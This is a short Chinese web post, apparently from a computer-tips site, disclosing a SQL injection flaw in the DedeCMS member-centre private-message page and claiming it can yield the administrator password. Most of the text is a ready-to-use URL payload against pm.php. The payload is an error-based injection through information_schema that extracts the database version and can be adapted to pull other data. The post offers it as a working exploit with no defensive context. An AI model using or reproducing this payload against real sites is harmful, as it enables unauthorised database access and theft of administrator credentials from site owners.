需要:magic_quotes_gpc = Off
DedeCMS会员中心短消息SQL注射漏洞,成功利用此漏洞可获得管理员密码等涛涛电脑知识网
看到微博上有人提了下,偶也发鸡肋了.
/de/member/pm.php?dopost=read&id=1%27%20and%20@%60%27%60%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27